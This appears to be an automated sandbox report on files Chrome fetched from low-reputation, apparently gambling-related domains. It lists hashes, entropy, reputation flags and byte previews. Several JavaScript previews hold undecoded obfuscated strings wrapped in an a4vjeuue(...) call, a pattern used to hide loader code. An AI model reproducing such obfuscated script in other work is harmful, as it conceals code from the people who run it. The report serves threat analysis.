                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BDA0C9838D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BDA0C9828D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (760), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):760
                                                                                                                                                          Entropy (8bit):5.710786358990766
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWvnTeh+TJzRicmXZStxj9Xz9cudnPmvRoOBCXoI+huRluN6rL3kSjq31JhWkG:VGaMficcMxj9Xz9c6nPaTBmMhuGNqLUg
                                                                                                                                                          MD5:1981D35BBD195A80CB7E031D80873C13
                                                                                                                                                          SHA1:382F0AB8C43D027A4F99933929022231461863D8
                                                                                                                                                          SHA-256:B98599E45C89EA6DEC465E44CD5DE8BA09EB0382DEEFF76B6D450D1A49CD62DC
                                                                                                                                                          SHA-512:E7968FCCD69A15A659B96B0A2FE5507C469FA5C2E93D889C01594E2EB1C1132E153761CD7B3F514A8380BDCF95BA4FAEBD974FD9AA6B3E5FB8AE83EB27411FA7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/iconSvg.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtATAdgGYBdAGgG8AiARgDcANANkoC4AzAVzRgBcBLdJh6kQpJAEoqHJCAAESHgCc+vSgG4A8mABWIXgDoAJiDZ80IAAqKUEEIp4BPTKMoB9VyCQBZFIY4AbEEoKWih/DhAWAEIABgBfcTUAZSUzAHNSACEUFECoNDVQxVk0AF5yNCgAW0jKFXQAWiRaNOCIawgkFnJ6tABhfygkLvJHWxYU5TQMxRAARw4+WcNo+NJrHigeSNGHcezckHzSYzYoAJ5o6ji40hgUKogObZWe+7QAOWrIzm5+QUksx4HEUaEoAGJeg1KABqHgACz4SH0vQGQyQN1uUHKszQxkU7C4vAEaEwkiKsh4pQRSP0ABIYLMtiAAKKBGpoYQgamI5GuGT+Nj6VwwAA+op4aiBILQshAmDqwXIMEGwxYlH8KB4PAavVksJpyNRqoxpGw8sozVaFAUWxUaLVlpauvewRV6O6G2ZLEN+i92yx2sUIzYKBg0igYEC6rO/hkwUoUGUUAaiMMxjB6qUEUoNzNFukQQoWyUI0oAA9/GY4Cx4bM2Kxfb0vjUbuJiO3xLdbfwYAAlEB4uwAMTQXWwxDihSTsj4pSQCoAagBVAD0AA5KOJMGhSFBSFFqKRfsTBDxJAvKHBlwBFJJb26UQxbFO0BoAFnXhHwUHXMQAnMEaABP4iQgEYJjnP4VJ8PoIDlhAKD2Ka153oSfwkkIIiSG2ahAA")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):240064
                                                                                                                                                          Entropy (8bit):5.999848834466704
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:7P+xNttMp/skuIKOkJlQA3s/OSWQXxheaYvs9q0W:7P+xNPe/skuIKOkJlT3U5NGm9q0W
                                                                                                                                                          MD5:07494A80B182D0BA087EBB2D664E51A0
                                                                                                                                                          SHA1:0FB27FB19950DEBC5ED54BC6956F6016D45A5C0E
                                                                                                                                                          SHA-256:37A852854C912B6C06040CDC8CB22DF2157DFADF796B70D7EBD5EBD441E80ABD
                                                                                                                                                          SHA-512:43719D7143D827A96EFC43B51EE525E9724AFD2CA39D48691D91B092388FD8D10229465A0A3D2D8B4575F2CF950B38D6CC288F94B9B0B1AD23EFF73987A053A6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/fiximg/ac-20200404/fileupload/uy09/202312/202312040232325.jpg
                                                                                                                                                          Preview:tZEkTJqSCi7LdbBGlJOnk5iH8h8U/qoeVixdvl4fo1AoDuyoHBnfpJb75B8A3ixSkb/5J/9TwIN0DmNUMG29h5G/+Sf/U8CDdA5jVDBtvYeRv/kn/1PAg3QOY1Qwbb2Hkb/5J/9TwIN0DmNUMG29h71c1wdYdVABGu3eqsdBDcaRv/kn/1PAg3QOY1Qwbb2Hkb/5J/9TwIN0DmNUMG29h5G/+Sf/U8CDdA5jVDBtvYeRv/kn/1PAg3QOY1Qwbb2Hkb/5J/9TwIN0DmNUMG29h7TuTKUcdu5m7ViJj5FZkY2RnmowBJBp6WUdIaVTQ9TpEpFSZssEoQtEcjB+uJf5DetqSYvquAWMM6ryIuS3mM2ifn76bXIs3pPib164jeJG5Ma9MJKhc3RQPRC9fYKhH6Qkuet3tl0s3/f0/gyJbvdO4ntkI56uxNMeR4fQNYGpJ4m4v1mLM9kv/Raz3TBVUt3wJjlrnowalVGtquIQsMdNLGJaONlE7fV++JnrTNtiDUg57yH9eEnlLyNzAdrO/WfLqbj/Cf1Ck1Od8rXARbvJeAZr/TsEIjfMKZmuHRuicjkyKzgsF1BdI70TTUy263/GO/NdHcnWcdwmwFVvO4yK/IAL/wG/z+aMchxCmx3U/NwcwwXEv5LDfDQqw7c7vfjNbY8bfU7lbOjE/2akWD/2UcNAP8xk3VqymjIGkhfhW0H6r89sHdixPJHEiE0iDSsYbX11i1rkZbRXZTxNnMSzgQki0LZ+gJzpYCckRj/9T/J7WgMPutVpV6Ujx43Ij6YpJKvajns7jbtS3MjgwjdZb+7WHn7uE1xZts8Pt6mlOHCJig1sHPUsrbT2Nz2S7nNgWULeUf6VNyHs4M+0flhTLpJTzlYsGuyl7YW8ivw5jN7XX3nBKvmcWRRHQxoH7K2Nbs4UDh7g/ahScSgIMr1szQ5qs7Pzwyg5VZp2iQWt3Mppe/NmPllNsWGmZEb8AzQZ/CWJrOIByIKZOe6K
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 18347
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6150
                                                                                                                                                          Entropy (8bit):7.9637699559005295
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:+LaDddR0m3OeFbgPvDA8lizlnRHmDAiApwx5q7NXjiGP+SlpF7KXqYdoE:+L0d0m3OeFgr5itR3YWx+k9YKE
                                                                                                                                                          MD5:A5E1E4BB6BE464092538A01955514E97
                                                                                                                                                          SHA1:DAA19D648AEAD24CDCEDB42B0083571639EA6908
                                                                                                                                                          SHA-256:CA1BC35CACF35EFF55D47B196B85683DB7B60DC8F10BB21D6BCD77155F1616ED
                                                                                                                                                          SHA-512:721FEBA34812A9BB24BA53D131FE050C7358881E60E9AC589D0FAA9322397A6A1CAA3F8F3AD4A5B4C4432B40B6E6D81FE93C0228D1077D8174082FF8B324BB6A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/curl/curl.js
                                                                                                                                                          Preview:...........<ks.F..EB.t..SR....Y..v.r....w?.I. b(A.....X....5/.Rr..8...........^.eS..Us.W..>o..u.A...'..\\D.r.V.......^.....G.U....m....}..y..F......M....t.....@.w.&-..bR&P...Oot^(.....w....K.._i.....%.F.....dv.H......U.............4t..7U..u........i.Nm.l.9_.M...Q/7....Z.{..#..&y....T....{....u....x...a......."]6w.J.zz1..J.....i..g.|.[.F.]..nj.t./o..X....8.Z.U......{.v.....O..l~..On...Y._u.j+l.:?.}.}..N..3*.y.....,....lq....C.x>I...$..........@.N^%...5...o.;.<Mz6.5.w..W..W0..2yu9...v.C......F...7e.iX..y.j..x...".q...|../.'.Q.{.W....g.?.5..J...ty..].=.>lB.3s...Y..v..e....7W.)r?.......2.*.N&@.~.....T..?.Ni.R.7A{.W....o..tG".qa.i.A.....3.5Y...b.....U...n8*..j.9..EQ...Xp#^..a.`&gX....>...".D..Dt..a4..*6K.+.......K=....it.%..eS..k....]..#BY...(...&o...9.;.D>...n......k.....).......X.-.1...\.)B9........._C/.+]_.7./......U..y.BL..O6...._..../........U...B..5.f..,-..*.A.E..J.......D.P}..f..LZ.....H.-t.*.......".S...Ul.}.....m...|..`.#Z.-.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (734), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):734
                                                                                                                                                          Entropy (8bit):4.868554581606508
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:1cqBUdX00OlM3GryvrIqE/NtttAedDH0gh8q9ZupLfgDeZiMEdvjYvZF:1ckU100OWG+yrvdDH6qj+L/EdbYH
                                                                                                                                                          MD5:62F09514F62F2C58E309B97F7EFF9498
                                                                                                                                                          SHA1:B1D21B21AFF68B45A1F6974AF36072494B7C47A9
                                                                                                                                                          SHA-256:1E22021B5E32AA80920143FD9CEAF19732FFDDE177D964C92D1C517ABDF32EB8
                                                                                                                                                          SHA-512:A7179C68BCE3729FFE3CD393B6A458C4F24878AD6C7391D8AD04552B378209A4ABB3D5756078FB41E83E922C7AAFABDF4D0520FF7E70A8DB75827F543281EFD4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1717580749344
                                                                                                                                                          Preview:define([],function(){var initializing=false,fnTest=/xyz/.test(function(){xyz})?/\b_super\b/:/.*/;this.Class=function(){};Class.extend=function(prop){var _super=this.prototype;initializing=true;var prototype=new this();initializing=false;for(var name in prop){prototype[name]=typeof prop[name]=="function"&&typeof _super[name]=="function"&&fnTest.test(prop[name])?(function(name,fn){return function(){var tmp=this._super;this._super=_super[name];var ret=fn.apply(this,arguments);this._super=tmp;return ret}})(name,prop[name]):prop[name]}function Class(){if(!initializing&&this.init){this.init.apply(this,arguments)}}Class.prototype=prototype;Class.prototype.constructor=Class;Class.extend=arguments.callee;return Class};return Class});
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13380
                                                                                                                                                          Entropy (8bit):7.947193700012093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:OMiNuMZ9aSfgV7ED4zQMjlg3k0ZNNf1iEtlUwizoJDj0wUSgBjDF1/W8Z7Wspv4S:OcO9aSo7E05z0ZNNfQE1BtsjGvspAS
                                                                                                                                                          MD5:5357E4239740BA9EC45D841B12D855FE
                                                                                                                                                          SHA1:7AD3F29D694D88A132DD04A972525E751D286279
                                                                                                                                                          SHA-256:62CDE00BFB7F2FC78CDDCEF1F756F1BF6B41938135FFFC2A983C4EF195A5290A
                                                                                                                                                          SHA-512:21963FFDC270538053958756B2CB00F56B325DF2AE36C23B913CCF4F1E81F8CF9A71E0EE102640DB0227611BE98F48645891B3F6222B28BCB7B9D040718B097B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/bbin_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BC4F1C158D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BC4F1C148D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (6260), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6260
                                                                                                                                                          Entropy (8bit):5.903209562814178
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:VPFuiHTwF6+ZHxMfYwlyOsJ/W7zP2yFlotJld1fWfDOSrtlFE6UCUX:VPFuiIZcYwlyOW/ur2yFlslaDOSPFED
                                                                                                                                                          MD5:F97103A4E49E2DC3AC750F0BCD5E8585
                                                                                                                                                          SHA1:EF0F6667DF298CFCAA6FA7A9A3422DC68A267372
                                                                                                                                                          SHA-256:9305BF3B584F127FD32799A428A676097D1C7768888B1B44EE167C03DEAF53AA
                                                                                                                                                          SHA-512:1DB8F2417C5590B93BD7DD84C522B1D4BAB4B75C56B12D3965C326EBE9FC31CE02C23F71646402B17B8D60C6C1CDDF12F6423A4B722D3BA035BD05EF4288C686
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/live800-cs.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgBZ8BdAGgG8AiATgFYBFAVyoC4AzJtGAFwEt0mEGR4BKCgDcoAJwAEaMtIDcaALxUAggCEAwgBEAogDEA4gAkAkggDSAGQCyAOQDyABQYAlAMoAVAKoAagDqABoAmgBaUGAwACYg7ADmABZ8AFZwADYAtmgoEACO0kg8TBLAAB4AngBeAAy4AExEdABsAOwAHDQA1AD0VIqqFNIoPJkcXLwCaEIi4tIgpdJosiAAPOs8AD4gAHwH+I0AtDwAvopj0pPc/ILCYiNLTCtrm0enuwd752QgaLE+FA0DdpvdxHx2EIAHQwdAlaRMXgoaSqVSOJjZMAgaSiRbLVa4Dq4XA0fB0ABk0mho3Gc06om2hEaXUadDo+FadSpNLGmTmjUIoiU7BRmCkch4qjqSh46xA0My/0SPGSsp6PVEIGwPBIqmp/0BwKEOpIwvxL1WIAu0mBsRQ2S0VR4ICQoLusxA4lF0nFMlkUuwJCU+xlIGOx1EPGhECYSGSmHsUFV0PYmRQYrZrQAVEmU7aAQ7MKIS0oLa9fmBna6fCggijYm7OLcZkJvWKJQHVEGyGo6kMZWh5YrlaqVBrFD1VAyeNhpN86CRtqptWgSJtBcdpABSI5l54Vi7ABtIWtOl1NqYetsUH1+yXd8h9lTrI7ZhVKtAqtVoKczmNxgmq4LiQ3ybmgu6NBSbJ0OaB6rJW1anigZggBU7qtl6t4dv6gZPtKL4fqOP4alGAHxpgJprt8QrQjwKBeDw0h8F+mBEiWIjkQmbGUquZp0QxTEsYkbGtKW5YIdCaQoCxmBUFQogXMkaFnkhGHgthvqdnhvYEUORFfmOv6qI0ZGxhR0DFCAFhoDwMJIEwYAIpgCimWQ7FwQSAYXFWF5nlASAgK0hDqZ67Zabhj4DmWw6ft+ZZTvgoh3p2KArnO67rESuxzj0uCZZ0OXSD0jTkHwBF8OshBKHwpG
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 14 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1142
                                                                                                                                                          Entropy (8bit):6.437317098042148
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:U1hiyWwjx82lY2T37VDnRdLRdyJ3VtDRYRRSGyyn5Xqc:auNn2v1RJRsJ3fDRIRSA6c
                                                                                                                                                          MD5:81C9A849D5D0825AF45E2B2F78D901FC
                                                                                                                                                          SHA1:62282B9E594751FB8ADCAE868B8D503E86F213B5
                                                                                                                                                          SHA-256:B3C4A7BCEFF4A3642083A85FFFA98A7145EC55422596AB00501E46DBF537B94A
                                                                                                                                                          SHA-512:2F1CA447B69F91B529CDF1D96CCE21F76ABD9D6428139EDB6C196FA9DAB1982E28FF83BDF8D7CB442E7A4E07B5E21674A927064819451460CBEA09CAC165D68E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/top/icon_psw.png
                                                                                                                                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:89276921F39411E7BE099690CD5A3249" xmpMM:DocumentID="xmp.did:89276922F39411E7BE099690CD5A3249"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8927691FF39411E7BE099690CD5A3249" stRef:documentID="xmp.did:89276920F39411E7BE099690CD5A3249"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>v.......IDATx.b...?.....m@...Al+tu.B............P9.....#...b7$q...G....)P..8..*...cb@.%(}......a.......,./..T ^..`
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 37 x 37, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1820
                                                                                                                                                          Entropy (8bit):7.312698512270435
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ozNn28wxtdvJ3eG3NrD39nnmqRKth63g5FvVMgKS9H1:y2fxtOG3NrD3/KtKg5BVjVH1
                                                                                                                                                          MD5:2DD6AAED477369A7BE785498379DD574
                                                                                                                                                          SHA1:24AE4C3ECB9AFB17C3F2BFFB1032BC5352ED9FB8
                                                                                                                                                          SHA-256:C3DDEAF1D66C0ED63D1919E22D3EE79F437378A6044A0C7B8F882F03967C2882
                                                                                                                                                          SHA-512:2C3E41DBF7AD753FDB96460FFE90719DBD511E5CC0226D58351C13031DB3A7D29D9229A8301A3240D833BA0238E0ED0946F4B8452F2553E8BD2CDE712E241C33
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...%...%...... .....tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.6 (Macintosh)" xmpMM:InstanceID="xmp.iid:C52714931EC611EE8653DFFA3047B159" xmpMM:DocumentID="xmp.did:C52714941EC611EE8653DFFA3047B159"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C52714911EC611EE8653DFFA3047B159" stRef:documentID="xmp.did:C52714921EC611EE8653DFFA3047B159"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...6....IDATx...[H.A....={..T...Bf....(.Ra"Be%]..{......%......b.(DXdt5..@.$..H++..p.{.?6...{v.\..........3;.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 334x81, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51903
                                                                                                                                                          Entropy (8bit):7.9823966822535715
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:vBUxnMpjuvOeqGdk+amBNMfQDVRsCEQMMEi:W1MpKHtdk+amByQDVRsCEQMi
                                                                                                                                                          MD5:9B07C91249EC2BB5EE64D023FB5B37F4
                                                                                                                                                          SHA1:ADFB859D2D0B4AEC25B187485690EFE11D80E47F
                                                                                                                                                          SHA-256:D478AD9153D362B78171A7D91E2F6BC22B66B65642DBAD867269C49380D6DF91
                                                                                                                                                          SHA-512:B6C39A30AA2A913C8073385E90000FA93A63575B0273BFC56BA5654D3AF753D988145000726A243D3016FBCF334B91673A40715E6EAC9602968BC74C92722D44
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......d......Adobe.d.................................................................................................................................................Q.N.........................................................................................................!"1#..2.Tv..8A.u.7w..x.9Qa..r.$t.5UY3s4.%.&6.'..........................!.....1A"Q2..a.#q.Br.....R.3$4t.6V9..Cs.5u..7w8b..S..U.vW.....DT..............?..W..........p......q.k..K..._.....3.@I..^>tr*...#......( '.d.0...oaK.e..i..!..#..T....(..N..>...B.C.a.\..w.[gn...Vww$G.H5ye`.T]F..I*..@.f......%\..}2... .d../..0..NECL..(....U..PL."l..\f.oN...s1.TeI.):.#7.0S.......'??{`......&..h`..`e.Y.C<..:k.?Z...V.Ln..,qz.x.\/C...8./C...8.f....+..5.Oz..l[..1.....c.$.c.w=.....>....1N...n.TP.l*.@...2[.._..g..o.1..[.v.].h+%....z8...+.....Q.j....._Gsh^.q...^R.......K.z.....M~'.......v4......L..._...&.m....t$-Z..v".......h[......_..*'pd......c.#h.@...~.O....C.../......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1550
                                                                                                                                                          Entropy (8bit):7.77344193615363
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:3OZJMMm8sG5z3jCJzdIV+7m20U1SHWEdyqkL2E:HMm45LjCLT7m2PU+Lj
                                                                                                                                                          MD5:F3977B4C5DB312A0AAAD659F70CDBB0E
                                                                                                                                                          SHA1:817B13ACE32DFB0C6202068D884F7CA2A4B7D08A
                                                                                                                                                          SHA-256:0FB866F604877ECAA4D8C2FE7E3508ADE5B803A1DB343D598121C77321AD4FF4
                                                                                                                                                          SHA-512:442B12492D48D4210301233D76F89616FAD5079D78A9D149218A6FC6EB35DCB9DA44D78382D6D5ECDE7B29029C88BD6FD4C62523A904148C865A76C70D2B92FB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/nav/icon-s/card_dt.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...m&=,8N....I.]-iB"~U*pH%mM'...*.....N8^..B.i5...yC b< l."uD%kG"d?!...6..1........T..*_.0W......C..@.n2.w/o9".....E.V,.r1..@lJ%..;_%...../<W0.}5......;...qP&y..ze,..'{L(s..E.........U$k)....M,.K..(..VJ*6b.7..H'....\AH...n.#/Z.O5E...~../X.()1.<O..>.`0^..}."....6.C...Y.K.....g...A.q:`... )...R.".AT.r:..........I..A...rE0..@.q...luM(.J...Uq..N..W*....O'qB...lmD/.X-h,!s...*......q.9..B"gO%v*.......s`-....r8Q....:r".\....q...iI".St...r;#...sQ)f@"B&.Vz.SF.yh5`.+.>Ud6..@\{f$..s..._!.,..m..{C06l.|..me3.....c....#/b.....zp7G<$oN$\...Ig_.#..._\)B."w..=98,..&:6......X./o@&.T.Q..L.F..A.@.v<..7.g1.a.}^..[,~......._..R..I.H.}=.<..5.s5..4.{3vL,.3!......G......................{..v..t.Ws..p.\.Y.X..O..J..I..G..E.O@.?k08.n/z./x.,n.)g)$Z#....................BQL....tRNS..........? ..........]JD?=9...............................xxojd]WVK;/,'&% ....................................................................................~|tssonmkjcb[ZXSKKIE
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 126 x 126, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25226
                                                                                                                                                          Entropy (8bit):7.980955822183112
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:e2YRQAUu/rimfuRJ5iOcs29YMwHWGwLdrNv:e27cGmYuls26XXwLdrNv
                                                                                                                                                          MD5:5C40BC59FC9EF171CFFA1FDF0894B378
                                                                                                                                                          SHA1:35CBD493087458725B9F1CC4D368404D9DAFA30D
                                                                                                                                                          SHA-256:2E8C2381274165C09CA76F2820AACD71106A2044FAB33AA8DC996C715CFD5C6A
                                                                                                                                                          SHA-512:F0E4B2176F100FAC39579C1CCAE61C33F7B6239B977661E829E83C71A6A22B6386D6BC61CB0564F80825FDB6F77216297F3D8E30EEB57987A87AFBF8AFC76489
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sponsor/03.png
                                                                                                                                                          Preview:.PNG........IHDR...~...~......#......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C....a.IDATx..w.]E..........^..IH....KG@PT.DA.....cA.aE...R.w....%!..~z?g....=...I@Px.w.k'..Ug.w.{.Q.......l..>...9......>.....@.p.> .?)}n.......r.m..<.X.J.`.@.......<}............=@.........o.>..[.T.e..a.0..5`.@.....\.. R@..r.!......N..i..h.Z.&....D.o.>...O5.z1.N.......m...h`%0D.^.................e.@..n............$..:..p........7.%..6 n.&....W D..pwX.?...F..s.C....Y...........6b.t".`'Bp....|.......#.^..".d...]...P.......\.p..sm.}u..9/.s."0.B.................kTL'..k...Q.?.x.....N.C...v....3 V!.=..:...H...=..s..lF......0<.P.!..@.".].N..}j..[.4.x......k.O..F...pn...Vd.6....hn....pa...J"........b...Bp...c..<......A.*..w....*..N.......*%.Ev.K.=9.....7.U.$=@1..F`5......r.....T.pX-2...cT@...[.......87.H.R.....Q/...U...$A.B....l..F`.~..K.w....`.....E.....1...P...C.i>.v..w;>..g.O...X......+#..{.'D.~...u!...x..~..*......~.0......x.X...qz....^.H.J..F..:>.s.HO#.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (724), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):724
                                                                                                                                                          Entropy (8bit):5.715946817998214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:4chWskUoC/bwhkP3tK1wCxn06TN2HhvG3U7ftYIF4j/950NhK0Z:VdMePAyMNqxGE7fuH950PHZ
                                                                                                                                                          MD5:25F45588D36767C57BD5CFCBC67F9634
                                                                                                                                                          SHA1:742214CC30A2305A5DA4259835B75EB3C417B584
                                                                                                                                                          SHA-256:0932F7FAA0235717FE2706BFC3D395E0DB235DAF22A711E33E9709D8354C363B
                                                                                                                                                          SHA-512:C13B039A7C8517E65145D5212A310713326DB37F6B1B57CB3D983F3D7915C1B3DDFF42FB3B4CFFAB7F496654E97BA0F33A43B30660F2FA0B15EE10FB72FBF629
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/240516-03/static/js/t4045-subNav-js.js
